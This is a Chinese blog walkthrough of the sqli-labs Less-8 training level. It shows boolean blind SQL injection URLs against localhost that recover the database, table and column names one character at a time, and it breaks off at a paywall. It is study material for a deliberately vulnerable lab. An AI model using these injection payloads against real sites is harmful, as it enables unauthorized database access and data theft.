sqli-lab靶场学习(三)——Less8-10(盲注、时间盲注)

已于 2025-02-28 11:45:14 修改
阅读量825 收藏 6
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: sql web安全
于 2024-09-19 20:02:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sadoshi/article/details/142333626

Less8

第八关依然是先看一般状态

http://localhost/sqli-labs/Less-8/?id=1

然后用单引号闭合:

http://localhost/sqli-labs/Less-8/?id=1'

这关的问题在于报错是不显示,那没办法通过上篇文章的updatexml大法处理。对于这种情况,需要用“盲注”,说白了就是猜,例如如下:

http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd

这里猜数据库第一个字幕是s,当然我们不是神,肯定不可能一猜就猜中。一般来说就得一个一个猜。当然我们可以利用二分查找的思路,通过大于小于的方式,确定并逐步缩小区间,这样可以减少查询的次数。

我们通过这样的方式,可以顺利查出所属数据库,另外还得先查字符串的长度,确定了长度再一个一个字符盲注尝试:

http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd

 一通操作下来,逐个字符对比,就能试出是security这个。同样的方法,可以找出在information_schema.tables中第四个表的表名是users:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd

这里都是忽略了一个一个表,一个一个字符尝试的过程。

之后用同样的方式,盲注找出列名:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asd

htt
最低0.47元/天 解锁文章

新学期VIP享超值加赠
sqli-labs Less-8(布尔
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 741
布尔其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-lab靶场学习(一)——Less1-4(语句闭合,联合注入
sadoshi的专栏
09-03 1071
最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习
SQL注入sqli-labs lesson-8 lesson -9 基于布尔值和基于时间的!
Zeker62的博客
07-24 361
在上一次讲解了lesson -1的sql基本注入,我们在注入的时候,它会返回错误信息 但是不会:什么是:我理解的是,web页面并不会返回错误信息,需要自己添加一些命令来让浏览器进行一些显而易见的行为,如果发生了这些行为,我们可以认为这次是报错(或者不报错,基于自己的设定)。 基于布尔值的 sqli-labs lesson-8 提示了是单引号的错误,但是我们是用 ?id=1 还是?id=1’ 判断,页面返回的结果是一样的: 我也不知道错没错,就是不显示咯 无法判断出是否错误,就需要用
sqli-labs(less-8)
墨鱼菜鸡
09-10 402
目录 less-8(布尔)手工 1.判断闭合方式 2.判断数据库个数 3.判断第一个数据库字符长度 4.根据ascii码判断每个库名的具体字符 5.判断security库中表的个数 6.判断security库里第一个表名的长度 7.判断security库里第一个表的第一个字符的ascii值 8.判断security.users表的...
sqli-labs靶场第八布尔
wanggonghanfei的博客
10-03 1876
Bool通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;或者为真时返回正常页面,为假时跳转到错误页面等。不需要返回结果,仅判断语句是否正常执行,在这种情况下我们可以使用布尔
SQLi LABS Less-8 布尔
热门推荐
wangyuxiang946的博客
06-27 1万+
SQLi第八sqllabs less-8sqli-labs less8 第一步,判断注入类型 先正常给一个id ?id=1 正常登录 , 提示 you are in 加个单引号' 试试 ?id=1' 没有反应 , 估计是后端报错了 , 但没有返回报错结果 再试试双引号" ?id=1" 又正常登录了 , 看来后端的SQL对单引号没有过滤 接下来验证一下,到底是不是单引号' ?id=1' and false -- a 加个fa...
Sqli-labsLess-8
→_→
03-30 2702
Less-8 GET--基于布尔值-单引号 根据题目提示可知这是单引号注入且需要通过进行通,那么首先利用单引号看一下网页的回显: 测试是否是注入点 发现什么也没有,也就是说网页不会返回任何报错信息,也不会返回其他信息即没有任何回显信息, Less1、5、7、8回显对比 ...
sqli-lab靶场学习(四)——Less11-14(post方法
sadoshi的专栏
09-20 547
第1-10都是get方法,本开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。
sqli-lab靶场学习(五)——Less15-17(post方法、修改密码)
sadoshi的专栏
02-08 794
第11-14开始用post方法,post方法和get方法类似。
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1324
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
sqli-labs脚本
06-24
sqli-labs脚本 sqli-labs脚本 sqli-labs脚本
sql注入系列之Sqli-labs(less-8)
BetsyMyGirl的博客
12-01 1060
判断注入点http://192.168.81.210/sqli/Less-8/?id=1id等于1的时候正常id等于1’的时候页面有改变,因此可以判断存在注入,并且是布尔型判断注入类型输入1 and 1=1 和 1 and 1=2发现页面无变化,可以猜测不是数字型注入,为什么?and 逻辑与当条件表达式两边都为真才是真,有一边为假则是假从下方图中可以发现,当and有一边为假的时候,是没有返回内容的所有我们输入的内容传入到数据库执行的语句就变成了select * from users where id=‘
sqli-labs (less-8)
kukudeshuo的博客
03-08 296
sqli-labs (less-8) 输入 http://127.0.0.1/sql1/Less-8/?id=1 #回显正常 http://127.0.0.1/sql1/Less-8/?id=1' #没有任何回显 http://127.0.0.1/sql1/Less-8/?id=1'--+ #回显正常 这里我们可以判断为字符型注入,但是他既没有具体错误回显也没有数据显示,所以这里我们只能选择使用Boolean http://127.0.0.1/sql1/Less-8/?id=1' and len
sqli-labs(less8)
m0_68980215的博客
07-08 318
lesson8
Sqli-labs Less8
orchid_sea的博客
10-16 1183
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
sqli-labs:less-8
羽的博客
07-15 149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs/Less-8
m0_71299382的博客
11-09 289
sqli-labs第八
sqlilabsless8
一个普普通通的博客
03-24 882
sqlilabsless8
sqli-lab靶场
最新发布
02-20
### SQL注入实验室(sqli-lab)的解题思路 #### 实验室概述 SQLi-Labs 是一个用于学习和实践 SQL 注入漏洞利用技巧的开源项目。该项目提供了一系列具有不同复杂度级别的 Web 应用程序,旨在帮助安全研究人员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值